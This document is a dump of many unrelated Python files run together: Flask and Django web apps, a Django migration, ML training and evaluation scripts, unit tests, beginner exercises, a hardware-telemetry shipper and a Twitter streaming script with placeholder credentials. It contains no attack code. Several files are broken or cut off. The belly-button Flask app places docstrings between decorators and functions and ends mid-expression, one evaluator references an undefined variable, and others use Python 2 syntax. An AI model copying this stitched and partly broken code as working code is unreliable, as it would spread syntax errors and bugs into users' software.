global pubnamerequest
pubnamerequest = publisher_name
publisherlink = GameLinkify(publisher_name)
return redirect(url_for('.PubPage', publisherlink=publisherlink))
@app.route('/publisher/<publisherlink>', methods=['POST', 'GET'])
def PubPage(publisherlink):
global pubnamerequest
publisher = publish_objects.find({'Publisher': pubnamerequest}).next()
publishersTupple = PublisherNames()
publishers = publishersTupple[0]
publishergame = publishersTupple[1]
publishyear = publishersTupple[2]
return render_template("Publisher_Template.html", publisher=publisher, gamesforpub=publishergame, publishername=pubnamerequest, publishyear=publishyear)
############ ROUTE TO GAME INSTANCE PAGES ############
@app.route('/game', methods=['POST'])
def GameRouting():
gamename = request.form['gamename']
gamelink = GameLinkify(gamename)
global gamepagerequest
gamepagerequest = gamename
return redirect(url_for('.GamePage', gamelink=gamelink))
@app.route('/game/<gamelink>')
def GamePage(gamelink):
global gamepagerequest
game = boardgameobjects.find({'Name': gamepagerequest}).next()
return render_template("Board_Game_Template.html", game=game)
if __name__ == "__main__":
app.run(debug=True) |
import re
from builtins import range
def camel_to_under(name):
"""
Converts camel-case string to lowercase string separated by underscores.
Written by epost (http://stackoverflow.com/questions/1175208).
:param name: String to be converted
:return: new String with camel-case converted to lowercase, underscored
"""
s1 = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", name)
return re.sub("([a-z0-9])([A-Z])", r"\1_\2", s1).lower()
def get_as_dict(x):
"""Return an object as a dictionary of its attributes."""
if isinstance(x, dict):
return x
else:
try:
return x._asdict()
except AttributeError:
return x.__dict__
def tokens_to_ngrams(tokens, n_min=1, n_max=3, delim=" ", lower=False):
f = (lambda x: x.lower()) if lower else (lambda x: x)
N = len(tokens)
for root in range(N):
for n in range(max(n_min - 1, 0), min(n_max, N - root)):
yield f(delim.join(tokens[root : root + n + 1]))
|
# import necessary libraries
import json
from flask import (
Flask,
render_template,
jsonify,
request)
from flask_sqlalchemy import SQLAlchemy
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Database Setup
#################################################
# The database URI
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///DataSets/belly_button_diversity.sqlite"
db = SQLAlchemy(app)
class Button(db.Model):
__tablename__ = 'button'
SAMPLEID = db.Column(db.Integer, primary_key = True)
EVENT = db.Column(db.String)
ETHNICITY = db.Column(db.String)
GENDER = db.Column(db.String)
AGE = db.Column(db.Integer)
WFREQ = db.Column(db.Integer)
BBTYPE = db.Column(db.String)
LOCATION = db.Column(db.String)
COUNTRY012 = db.Column(db.String)
ZIP012 = db.Column(db.Integer)
COUNTRY1319 = db.Column(db.String)
ZIP1319 = db.Column(db.Integer)
DOG = db.Column(db.String)
CAT = db.Column(db.String)
IMPSURFACE013 = db.Column(db.Integer)
NPP013 = db.Column(db.Float)
MMAXTEMP013 = db.Column(db.Float)
PFC013 = db.Column(db.Float)
IMPSURFACE1319 = db.Column(db.Integer)
NPP1319 = db.Column(db.Float)
MMAXTEMP1319 = db.Column(db.Float)
PFC1319 = db.Column(db.Float)
@app.route("/")
"""Return the dashboard homepage."""
def home():
return render_template("index.html")
@app.route('/names')
"""List of sample names."""
def sample_names():
query_statement = db.session.query(Button.SAMPLEID).all()
df = pd.DataFrame(query_statement, columns = ['name', 'id'])
return jsonify(df)
@app.route('/otu')
"""List of OTU descriptions."""
def descriptions():
query_statement = db.session.query(Button.) |
import math
x = 1
x = 1.1
x = 1 + 2j # complex number
print(10 + 3)
print(10 - 3)
print(10 * 3)
print(10 / 3)
print(10 // 3)
print(10 % 3)
print(10 ** 3)
x = 10
x = x + 3
x += 3
print(x)
print(round(2.9))
print(abs(-2.4))
print(math.ceil(2.2))
x = int(input("x: "))
y = x + 1
print(y)
print(type(y))
# False values in Python
# ""
# 0
# None
|
from flask import Flask
from flask import request
app = Flask(__name__)
@app.route('/', methods=['GET','POST'])
def serve_part2():
# get request arguments
user_id = request.args.get('userid')
n = request.args.get('n')
# input validations
if user_id is None:
return "user id is invalid"
if n is None:
return "n is invalid"
try:
int(n)
except Exception:
return "n is not a number"
highest_predictions = "nice, its working"
return highest_predictions
if __name__ == '__main__':
print "web service is running"
app.run(debug=True)
|
"""
This module contains functions that validate neural networks for predicting device performance,
based on tabular data and m2py labels
"""
import os
import sys
import numpy as np
import torch
import torch.nn as nn
module_path = os.path.abspath(os.path.join('./'))
if module_path not in sys.path:
sys.path.append(module_path)
import physically_informed_loss_functions as PhysLoss
torch.manual_seed(28)
def eval_OPV_df_model(model, testing_data_set):
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
#evaluate the model
model.eval()
pce_criterion = PhysLoss.ThresholdedMSELoss(lower = 0, upper = 6)
voc_criterion = PhysLoss.ThresholdedMSELoss(lower = 0, upper = 1)
jsc_criterion = PhysLoss.ThresholdedMSELoss(lower = 0, upper = 10)
ff_criterion = PhysLoss.ThresholdedMSELoss(lower = 10, upper = 85)
accuracy = PhysLoss.MAPE()
#don't update nodes during evaluation b/c not training
with torch.no_grad():
test_losses = []
pce_test_losses = []
voc_test_losses = []
jsc_test_losses = []
ff_test_losses = []
pce_test_acc_list = []
voc_test_acc_list = []
jsc_test_acc_list = []
ff_test_acc_list = []
test_total = 0
for inputs, pce_labels, voc_labels, jsc_labels, ff_labels in testing_data_set:
inputs = inputs.to(device)
pce_labels = pce_labels.to(device)
voc_labels = voc_labels.to(device)
jsc_labels = jsc_labels.to(device)
ff_labels = ff_labels.to(device)
PCE_out, Voc_out, Jsc_out, FF_out = model(inputs)
# calculate loss per batch of testing data
pce_test_loss = pce_criterion(PCE_out, pce_labels)
voc_test_loss = voc_criterion(Voc_out, voc_labels)
jsc_test_loss = jsc_criterion(Jsc_out, jsc_labels)
ff_test_loss = ff_criterion(FF_out, ff_labels)
test_loss = pce_test_loss + voc_test_loss + jsc_test_loss + ff_test_loss
test_losses.append(test_loss.item())
pce_test_losses.append(pce_test_loss.item())
voc_test_losses.append(voc_test_loss.item())
jsc_test_losses.append(jsc_test_loss.item())
ff_test_losses.append(ff_test_loss.item())
test_total += 1
pce_acc = accuracy(PCE_out, pce_labels)
voc_acc = accuracy(Voc_out, voc_labels)
jsc_acc = accuracy(Jsc_out, jsc_labels)
ff_acc = accuracy(FF_out, ff_labels)
pce_test_acc_list.append(pce_acc)
voc_test_acc_list.append(voc_acc)
jsc_test_acc_list.append(jsc_acc)
ff_test_acc_list.append(ff_acc)
test_epoch_loss = sum(test_losses)/test_total
pce_test_epoch_loss = sum(pce_test_losses)/test_total
voc_test_epoch_loss = sum(voc_test_losses)/test_total
jsc_test_epoch_loss = sum(jsc_test_losses)/test_total
ff_test_epoch_loss = sum(ff_test_losses)/test_total
pce_epoch_acc = sum(pce_test_acc_list)/test_total
voc_epoch_acc = sum(voc_test_acc_list)/test_total
jsc_epoch_acc = sum(jsc_test_acc_list)/test_total
ff_epoch_acc = sum(ff_test_acc_list)/test_total
print(f"Total Epoch Testing Loss = {test_epoch_loss}")
print(f"Total Epoch Testing Accuracy: PCE = {pce_epoch_acc}")
print(f" Voc = {voc_epoch_acc}")
print(f" Jsc = {jsc_epoch_acc}")
print(f" FF = {ff_epoch_acc}")
return test_epoch_loss, pce_test_epoch_loss, voc_test_epoch_loss, jsc_test_epoch_loss, ff_test_epoch_loss, pce_epoch_acc, voc_epoch_acc, jsc_epoch_acc, ff_epoch_acc
def eval_OPV_m2py_model(model, testing_data_set, criterion):
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
#evaluate the model
model.eval()
#don't update nodes during evaluation b/c not training
with torch.no_grad():
test_losses = []
test_total = 0
for inputs, labels in testing_data_set:
images = images.to(device)
labels = labels.to(device)
outputs = model(inputs)
# calculate loss per batch of testing data
test_loss = criterion(outputs, labels)
test_losses.append(test_loss.item())
test_total += 1
total_test_loss = sum(test_losses)/test_total
print (f"Total testing loss is: {total_test_loss}")
return total_test_loss
|
'''Write a python function find_smallest_number() which accepts a number n and returns the smallest number having n divisors.
Handle the possible errors in the code written inside the function.
Sample Input Expected Output
16 120
'''
def find_divisors(num):
divisors=[]
for i in range(1, num+1):
if num%i==0:
divisors.append(i)
return len(divisors)
def find_smallest_number(num):
for i in range(2, 10000):
if find_divisors(i) == num:
return i
num=16
print("The number of divisors :",num)
result=find_smallest_number(num)
print("The smallest number having",num," divisors:",result)
|
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
from library import *
def seed_all(seed=2020):
np.random.seed(seed)
tf.random.set_seed(seed)
seed_all()
#########################################################
#########################################################
# import numpy as np
# a = tf.constant([[1,2],[3,6],[1,0]])
# b = tf.constant([15,8])
# temp = np.tile(np.square(np.linalg.norm(a,axis=1)),(b.shape[0],1)) + np.tile(np.square(np.linalg.norm(b,axis=1)),(a.shape[0],1)).T - (2*(np.matmul(b,a.T)))
# print(tf.norm(a-b,1,axis=1))
def generate_data_single(name,SR=data_mir.SR,Hs=data_mir.Hs,Ws=data_mir.Ws,N_fft=data_mir.N_fft):
f_path1 = os.path.join('mirex05',name+'.wav')
f_path2 = os.path.join('mirex05',name+'REF.txt')
wav, sr = librosa.core.load(f_path1,sr=SR)
HOP_len = int(sr * Hs)
WIN_len = int(sr * Ws)
temp = np.abs(librosa.core.stft(wav,hop_length=HOP_len,win_length=WIN_len,n_fft=N_fft))
temp = librosa.core.amplitude_to_db(temp,ref=np.mean)
pitch_vals = np.loadtxt(f_path2)
minm = min(temp.shape[1],pitch_vals.shape[0])
X = (temp.T)[:minm]
Y = pitch_vals[:minm,1]
return X,Y
#########################################################
#########################################################
target_X,target_Y = generate_data_single('train06')
target_X = target_X[target_Y>1]
target_Y = target_Y[target_Y>1]
target_X = transform_X(target_X[:,:512])
ind = np.arange(target_X.shape[0])
# ind = np.array([2093,2127,2052,647,714,741,641,548,558,756,31,37,143,49,1241,301])
np.random.shuffle(ind)
x_tar = tf.convert_to_tensor(np.take(target_X,ind[:16],0))
y_tar = tf.convert_to_tensor(np.take(target_Y,ind[:16],0))
model = NN_regressor_dsne(512)
model.load_weights('saved_models/model_mir_for_dsne_weights.h5')
# obj = np.empty(n_class,dtype=object)
# for c in range(n_class):
# obj[i] = np.argwhere(np.round(freq2midi(y_src))==c)[0]
# tar = tf.data.Dataset.from_tensor_slices((x_tar, y_tar))
# tar = tar.shuffle(y_tar.shape[0]+1, reshuffle_each_iteration=True)
def hausdorffian_distance(xt,y,feat_src,y_src):
y_src = y_src.numpy()
y = y.numpy()
ind_y = np.argwhere(np.round(freq2midi(y_src))==np.round(freq2midi(y)))[0]
all_ind = np.arange(feat_src.shape[0])
ind_not_y = np.setxor1d(all_ind, ind_y)
same_class_max = tf.reduce_max(tf.norm(tf.gather(feat_src,ind_y)-xt,2,axis=1))
diff_class_min = tf.reduce_min(tf.norm(tf.gather(feat_src,ind_not_y)-xt,2,axis=1))
return same_class_max-diff_class_min
pred = model()
# ind_1 = np.arange(100)
# opt = tf.keras.optimizers.Adam(0.0005)
# loss_mse = tf.keras.losses.MeanAbsoluteError()
# epochs = 25; alpha=0.5; beta=1.0
# acc = []
# for epoch in range(epochs):
# # tar = tar.shuffle(len_tar+1)
# count=0
# np.random.shuffle(ind_1)
# for tar_x,tar_y in tar:
# for src_ind in ind_1[:10]:
# x_src = tf.convert_to_tensor(np.load('data/dsne/src/src_X_t_{}.npy'.format(src_ind)))
# y_src = tf.convert_to_tensor(np.load('data/dsne/src/src_Y_{}.npy'.format(src_ind)))
# with tf.GradientTape() as tape:
# out_src = model(x_src,training=True)
# out_tar = model(x_tar,training=True)
# out_tar_sample = model(tf.reshape(tar_x,[1,tar_x.shape[0]]),training=True)
# loss_mse_tot = loss_mse(y_src,out_src[0]) + beta*loss_mse(y_tar,out_tar[0])
# loss_value= (
# (1-alpha)*loss_mse_tot
# + alpha*hausdorffian_distance(out_tar_sample[1],tar_y,out_src[1],y_src)
# )
# grads = tape.gradient(loss_value,model.trainable_weights)
# opt.apply_gradients(zip(grads, model.trainable_weights))
# print('epoch',epoch,'target count',count,'source',src_ind)
# count+=1
# rpa,_ = evaluation_dsne(model,target_X,target_Y)
# acc.append(rpa)
# print('############################')
# print('epoch',epoch,'target_RPA',rpa)
# print('############################')
# # model.save_weights('saved_models/dsne/model_dsne_weights.h5')
# acc.reverse()
# acc.append(0.5)
# acc.reverse()
# acc = np.array(acc)
# print(np.max(acc),np.argmax(acc))
# plt.plot(np.arange(epochs+1),acc,'o-')
# plt.show() |
# Generated by Django 3.0.2 on 2020-03-19 19:47
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.CharField(max_length=120)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=250)),
('title', models.CharField(max_length=120, unique=True)),
('description', models.TextField()),
('current_price', models.FloatField()),
('old_price', models.FloatField(blank=True, null=True)),
('date_of_publication', models.DateField()),
('lable', models.CharField(choices=[('new', 'new'), ('best saler', 'best saler')], max_length=50)),
('slug', models.SlugField(blank=True, null=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now_add=True)),
('stock', models.IntegerField(default=1)),
('category', models.ManyToManyField(to='products.Category')),
('related_product', models.ManyToManyField(blank=True, null=True, related_name='_product_related_product_+', to='products.Product')),
],
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='books/')),
('front', models.BooleanField(default=False)),
('back', models.BooleanField(default=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now_add=True)),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Product')),
],
),
]
|
from jsonpickle import encode as json_encode
from requests import post as http_post, get as http_get
from Client.Logger import logger
class Shipper(object):
"""
Responsible for sending hardware_objects_lib.Computer objects
to the centralized server which handles these data.
"""
def __init__(self, host, port, timeout=5):
self.timeout = timeout
common_endpoint_format = "http://{host}:{port}/{endpoint}"
self._server_ship_address = common_endpoint_format.format(
host=host, port=port,
endpoint="api/add_measurement"
)
self._server_ping_address = common_endpoint_format.format(
host=host, port=port,
endpoint="api/ping"
)
self._ping_server()
def _ping_server(self):
try:
response = http_get(self._server_ping_address, timeout=self.timeout)
assert response.status_code == 200 and response.text == 'pong'
except Exception as ex:
logger.critical("Pinging the server failed! Shipping will probably fail!")
logger.critical("Exception msg: [%s]" % str(ex))
def ship(self, computer_obj):
try:
computer_json = json_encode(computer_obj, unpicklable=True)
payload = {
'payload': computer_json
}
response = http_post(self._server_ship_address, data=payload, timeout=self.timeout)
if response.status_code == 200:
pass
elif response.status_code == 202:
logger.warning('The server ignored the shipped measurement')
else:
logger.warning(
'Server responded with status code %i and message %s' % (response.status_code, response.text))
except Exception as ex:
logger.critical("Cannot ship to the server")
logger.critical("Exception msg: [%s]" % str(ex))
|
import os
import pytest
import sys
import ray
@pytest.mark.parametrize(
"call_ray_start_with_external_redis", [
"6379",
"6379,6380",
"6379,6380,6381",
],
indirect=True)
def test_using_hostnames(call_ray_start_with_external_redis):
ray.init(address="127.0.0.1:6379", _redis_password="123")
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
@ray.remote
class Counter:
def __init__(self):
self.count = 0
def inc_and_get(self):
self.count += 1
return self.count
counter = Counter.remote()
assert ray.get(counter.inc_and_get.remote()) == 1
if __name__ == "__main__":
import pytest
# Make subprocess happy in bazel.
os.environ["LC_ALL"] = "en_US.UTF-8"
os.environ["LANG"] = "en_US.UTF-8"
sys.exit(pytest.main(["-v", __file__]))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
创建一个模块,包含一个阶乘函数f1(n)、一个列表删值函数f2(lst,x),一个等差数列求和函数f3(a,d,n)
'''
#阶乘 从1开始乘
def factorial(n):
result = 1
for x in range(1, n+1):
result *= x
print('%d的阶乘为:%d' %(n, result))
#列表删值函数 入参为:list,想删的值
def remove_lst(lst, x):
# for i in lst:
# lst.remove(x)
# print('删除后的结果为:',lst)
#
#不能使用for循环,不知道要循环几次,也不知道什么时候不满足条件才推出
while(x in lst):
lst.remove(x)
print('删除后的结果为:',lst)
def arithmetic_progression_sum(a, d, n):
an = a
sum = a
for x in range(n - 1):
an += d
sum += an
print('首项为%d,公差为%d,项数为%d,等差数列的和为%d' %(a, d, n, sum))
arithmetic_progression_sum(10,5,5)
|
'''
Created on Dec 21, 2012
@author: dough
'''
import unittest
from mock import MagicMock
from recording_schedule import *
from time import time
from source import Source
class TestRecordingSchedule(unittest.TestCase):
def setUp(self):
self._source = Source("dummy source")
self.rec_sch = RecordingSchedule(self._source)
def test_nameDefaultToBlankString(self):
self.assertEqual(self.rec_sch.name, '')
def test_canBeAssignedAName(self):
assigned_name = 'My Schedule'
self.rec_sch.name = assigned_name
self.assertEqual(self.rec_sch.name, assigned_name)
def test_targetsASource(self):
self.assertIsInstance(self.rec_sch.source, Source)
def test_startTimeDefaultsToImmediate(self):
self.assertEqual(self.rec_sch.start_date_time, int(time()) )
def test_endTimeDefaultsToStartPlusDefaultDuration(self):
self.assertEqual(self.rec_sch.end_date_time, self.rec_sch.start_date_time + self.rec_sch.DEFAULT_DURATION)
def test_startTimeCanNotBeInThePast(self):
start_time = time() - 5
self.assertRaises(StartTimeHasPassedError, RecordingSchedule, self._source, start_date_time=start_time)
def test_endTimeCanNotBeInThePast(self):
end_time = time() - 5
self.assertRaises(EndTimeHasPassedError, RecordingSchedule, self._source, end_date_time=end_time)
def test_endTimeMustBeAfterStartTime(self):
now = time()
start_time = now
end_time = now
self.assertRaises(EndBeforeStartError, RecordingSchedule, self._source, start_date_time=start_time,
end_date_time=end_time)
def test_startRecordingCallsStartRecordingOnTargetSource(self):
self._source.start_recording = MagicMock(name='start_recording')
self.rec_sch.start_recording()
self.assertTrue(self._source.start_recording.called)
def test_stopRecordingCallsStopRecordingOnTargetSource(self):
self.rec_sch.start_recording()
self._source.stop_recording = MagicMock(name='start_recording')
self.rec_sch.stop_recording()
self.assertTrue(self._source.stop_recording.called)
class TestRecordingScheduleLifecycleBehaviour(unittest.TestCase):
def setUp(self):
self._source = Source("dummy source")
self.rec_sch = RecordingSchedule(self._source)
def test_afterCreation_statusIsNotScheduled(self):
self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_NOT_SCHEDULED)
def test_afterScheduleCalled_statusIsScheduled(self):
self.rec_sch.schedule()
self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_SCHEDULED)
def test_afterStartRecording_statusIsActive(self):
self.rec_sch.start_recording()
self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_ACTIVE)
def test_afterStoppingAnActiveRecording_statusIsComplete(self):
self.rec_sch.start_recording()
self.rec_sch.stop_recording()
self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_COMPLETE)
def test_cancelledWhenActive_statusIsCancelled(self):
self.rec_sch.start_recording()
self.rec_sch.cancel()
self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_CANCELLED)
def test_cancelledWhenScheduled_statusIsCancelled(self):
self.rec_sch.schedule()
self.rec_sch.cancel()
self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_CANCELLED)
def test_cancellingWhenNotScheduledIsNotScheduledError(self):
self.assertRaises(NotScheduledError, self.rec_sch.cancel)
def test_stopRecordingWhenNotStartedIsNotStartedError(self):
self.assertRaises(NotStartedError, self.rec_sch.stop_recording)
if __name__ == "__main__":
unittest.main() |
#
# Outputer utils
#
# Copyright (c) 2020, Arm Limited. All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
#
import os
import builtins
import abc
import collections as co
import itertools as it
import string
import io
import re
from ..glue import Inherit
OUTPUTS = co.OrderedDict()
def output(cls):
assert cls.__argname__ not in OUTPUTS
OUTPUTS[cls.__argname__] = cls
return cls
# TODO enable inclusive inheritance between StringIO and file?
class OutputBlob(io.StringIO):
def __init__(self, *args, **kwargs):
super().__init__(*args)
self._attrs = []
self._needindent = True
self.pushattrs(**{'':''})
self.pushattrs(**kwargs)
def writef(self, _fmt, **kwargs):
with self.pushattrs(**kwargs):
_fmt = _fmt % self.attrs()
for c in _fmt:
if c == '\n':
self._needindent = True
else:
if self._needindent:
self._needindent = False
super().write(self.get('indent', 0)*' ')
self.write(c)
def print(self, *args):
for arg in args:
self.write(str(arg))
self.write('\n')
def printf(self, *args, **kwargs):
for arg in args:
self.writef(str(arg), **kwargs)
self.writef('\n')
def pushattrs(self, **kwargs):
nkwargs = {}
for k, v in kwargs.items():
while isinstance(v, str) and '%(' in v:
v = v % self.attrs(**kwargs)
nkwargs[k] = v
self._attrs.append(nkwargs)
class context:
def __enter__(_):
return self
def __exit__(*_):
self.popattrs()
return context()
def popattrs(self):
return self._attrs.pop()
def indent(self, indent=4):
""" alias for pushindent """
return self.pushindent()
def pushindent(self, indent=4):
return self.pushattrs(indent=self.get('indent', 0) + indent)
def popindent(self):
assert set(self._attrs[-1].keys()) == {'indent'}
return self.popattrs()['indent']
def _expand(self, k, v):
return v
# TODO this takes too long
# with self.pushattrs(**{k: None}):
# for rule in [lambda: v(self), lambda: v()]:
# try:
# return rule()
# except TypeError:
# continue
# else:
# return v
def _expandall(self, attrs):
expanded = {}
for k, v in attrs.items():
if v is None:
continue
expanded[k] = self._expand(k, v)
if k.upper() not in expanded and isinstance(expanded[k], str):
expanded[k.upper()] = expanded[k].upper()
return expanded
def __getitem__(self, key):
for a in reversed(self._attrs):
if key in a:
if a[key] is None:
raise KeyError(key)
return self._expand(key, a[key])
for a in reversed(self._attrs):
a = {k.upper(): v for k, v in a.items()}
if key in a:
return self._expand(key, a[key]).upper()
raise KeyError(key)
def __contains__(self, key):
try:
self[key]
return True
except KeyError:
return False
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
def attrs(self, **kwargs):
attrs = {}
for a in self._attrs:
attrs.update(a)
attrs.update(kwargs)
return self._expandall(attrs)
def __str__(self):
return self.getvalue()
class OutputField(list):
def __init__(self, inherit=None, rules={}, **kwargs):
super().__init__()
self._inherit = inherit
self._rules = rules
self._attrs = kwargs
def insert(self, _i, _fmt=None, **kwargs):
if isinstance(_fmt, OutputBlob):
outf = _fmt
else:
outf = OutputBlob(**{
**self._inherit.attrs(),
**self._attrs,
**kwargs})
for type, rule in self._rules.items():
if isinstance(_fmt, type):
rule(outf, _fmt)
break
else:
if _fmt is not None:
outf.writef(_fmt)
super().insert(_i, outf)
return outf
def append(self, _fmt=None, **kwargs):
return self.insert(len(self), _fmt, **kwargs)
def extend(self, iterable):
for x in iterable:
self.append(x)
class Output(Inherit(
['%s%s%s' % (op, level, order)
for op, level, order in it.product(
['box', 'build'],
['_root', '_muxer', '_parent', ''],
['_prologue', '', '_epilogue'])]), OutputBlob):
@classmethod
def __argparse__(cls, parser, **kwargs):
parser.add_argument("path",
help=cls.__arghelp__)
parser.add_argument("--path",
help=cls.__arghelp__)
def __init__(self, path=None):
super().__init__()
self.name = self.__argname__
self.path = path
def __eq__(self, other):
if isinstance(other, Output):
return self.name == other.name
else:
return self.name == other
def __lt__(self, other):
if isinstance(other, Output):
return self.name < other.name
else:
return self.name < other
def box(self, box):
super().box(box)
self.pushattrs(
name=self.name,
path=self.path,
root=getattr(box.getroot(), 'name', None),
muxer=getattr(box.getmuxer(), 'name', None),
parent=getattr(box.getparent(), 'name', None),
box=box.name)
# Output class imports
# These must be imported here, since they depend on the above utilities
from .c import HOutput, COutput
from .ld import LdOutput
from .mk import MkOutput
from .rust import RustLibOutput
from .wasm import WasmHOutput, WasmCOutput
# output glue for connecting default runtime generation
import importlib
from .. import glue
importlib.reload(glue)
class OutputGlue(glue.Glue):
__argname__ = "output_glue"
def __init__(self):
super().__init__()
# we offer redirection for build_parent_mk -> parent.mk.build_parent
for op, level, Output, order in it.product(
['box', 'build'],
['_root', '_muxer', '_parent', ''],
OUTPUTS.values(),
['_prologue', '', '_epilogue']):
m = getattr(Output, '%s%s%s' % (op, level, order), None)
if m:
setattr(self, '%s%s_%s%s' % (
op, level, Output.__argname__, order), m)
|
#-*- coding:utf-8 -*-
'''
Created on 2015年11月29日
@author: LeoBrilliant
'''
#-*- coding:utf-8 -*-
'''
Created on 2015年11月25日
@author: LeoBrilliant
#获取大盘指数历史行情
'''
import DBAccess.MySQLdb.MySQLAccess as msql
import tushare as ts
from datetime import datetime
#连接数据库,当前参数为地址、用户、密码(可控)、数据库
#db = MySQLdb.connect("localhost", "root", "", "Data")
#db = MySQLdb.connect(host="localhost", user="root", passwd="", db="Data", charset="utf8")
db = msql.MySQLConnection.GetConnection()
tradingday = datetime.strftime(datetime.today(), "%Y-%m-%d")
code = '600848'
tradingday = '2015-11-27'
data = ts.get_tick_data(code=code, date=tradingday)
data['tradingday'] = tradingday
data['code'] = code
indexdata = data.set_index(['tradingday', 'code'])
#ret = indexdata.to_sql("t_his_tick_data", db, flavor="mysql", if_exists="append")
#关闭连接
db.close()
print("Success") |
import asyncio
from tornado import websocket
# define a coroutine
async def custom_coroutine():
print("opening a websocket to localhost:8000/test")
await asyncio.sleep(1)
ws= await websocket.websocket_connect("ws://localhost:8000/test")
print("trying to read an open websocket")
await asyncio.sleep(1)
first_message= await ws.read_message()
print("first message is " + first_message + ". sleeping 4 seconds")
await asyncio.sleep(4)
print("trying to read again, this time on closed websocket but with unread message")
first_message= await ws.read_message()
print("second message is " + first_message)
await asyncio.sleep(1)
print("trying to read again on closed websocket")
message= await ws.read_message()
print("Got " + str(message), "indicating that websocket's closed and theres no unread messages")
print("trying to write to the closed websocket")
await asyncio.sleep(1)
try:
await ws.write_message("aaa")
except websocket.WebSocketClosedError as e:
print("Got WebsocketClosedError: " + str(e))
print("trying to read again, on a closed websocket")
message= await ws.read_message()
import random
if random.randint(0,9) % 2==0:
print("trying to read again, on a closed websocket. It hangs")
await asyncio.sleep(1)
message= await ws.read_message()
# execute the coroutine
asyncio.run(custom_coroutine())
|
import time
from django.http import HttpResponse
from django.shortcuts import render
# Create your views here.
def handle_ajax(request):
"""
接受ajax请求,并给以响应
:param request:
:return:
"""
time.sleep(10)
name = request.POST.get("name")
age = request.POST.get("age")
print(name,age)
#......业务处理
#响应一段字符 即可
return HttpResponse("你好,这是给你的响应")
def handle_username(request):
"""
验证用户名是否重复
:param request:
:return:
"""
time.sleep(3)
username = request.POST.get("username")
#验证逻辑 XXX.objects.get(username=username)
if username == "wanglulu":
return HttpResponse("error")
return HttpResponse("ok")
def test(request):
pass
|
import unittest
from tests.test_python_generator.utils import PythonGeneratorUtils
class ListTestCase(PythonGeneratorUtils):
save_output_files: bool = False
def test_list(self):
import tests.test_python_generator.py.list as doc
jsg = 'l {e:@string*}'
test_cases = [
'{"e": []}',
'{"e": ["abc"]}'
]
self.do_test(jsg, 'list', doc, test_cases, {})
import tests.test_python_generator.py.list_2 as doc2
jsg2 = 'l {e:@string+}'
test_cases2 = [
'{"e": ["abc"]}'
]
fail_test_cases2 = [
'{}',
'{"e": null}',
'{"e": []}',
]
self.do_test(jsg2, 'list_2', doc2, test_cases2, {}, fail_test_cases2)
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
__author__ = 'oscar@outliers.es'
# Twitter lib used for user lookup + streaming: https://github.com/sixohsix/twitter [easy_install twitter]
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import pprint
import json
import traceback
import shutil
# Go to http://dev.twitter.com and create an app.
# The consumer key and secret will be generated for you after
consumer_key = YOUR_CONSUMER_KEY
consumer_secret = YOUR_CONSUMER_SECRET
# After the step above, you will be redirected to your app's page.
# Create an access token under the the "Your access token" section
access_token = YOUR_ACCESS_TOKEN
access_token_secret = YOUR_TOKEN_SECRET
TMP_FILE = "network.tmp.json"
DEF_FILE = "network.json"
nodes = []
links = []
nodes_dict = {}
links_dict = {}
# Persist the network into a d3 force layout consumible json
def persist_network():
with open(TMP_FILE, "wb") as file_out:
json.dump({'nodes': nodes, 'links': links}, file_out)
shutil.move(TMP_FILE, DEF_FILE)
# Inserts a tweet into the network structure
def insert_tweet_in_network(tweet):
# Get source and target
source_user = tweet['retweeted_status']['user']['screen_name']
source_followers = tweet['retweeted_status']['user']['followers_count']
target_user = tweet['user']['screen_name']
target_followers = tweet['user']['followers_count']
print "INSERTING edge from %s w/ follower count %d to %s w/ follower count %d" \
% (source_user, source_followers, target_user, target_followers)
# Insert nodes if they do not exist
if source_user not in nodes_dict:
nodes_dict[source_user] = len(nodes)
nodes.append({'user': source_user, 'followers': source_followers})
if target_user not in nodes_dict:
nodes_dict[target_user] = len(nodes)
nodes.append({'user': target_user, 'followers': target_followers})
# Insert links if they do not exist
link_name = source_user + "->" + target_user
if link_name not in links_dict:
links_dict[link_name] = len(links)
links.append({'source': nodes_dict[source_user], 'target': nodes_dict[target_user], 'value': 0})
# Increment 'value' content for the link
links[links_dict[link_name]]['value'] += 1
persist_network()
class MyListener(StreamListener):
""" Listener that calls insert_tweet_in_network if a retweet comes by
"""
def on_data(self, data):
tweet = json.loads(data)
try:
if 'retweeted_status' in tweet:
insert_tweet_in_network(tweet)
except:
print "*UNEXPECTED ERROR, TRACE DUMP HERE:*"
traceback.print_exc()
return True
def on_error(self, status):
print status
# Authenticate
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
# ...and start streaming
stream = Stream(auth, MyListener())
stream.filter(track=["iphone"])
|
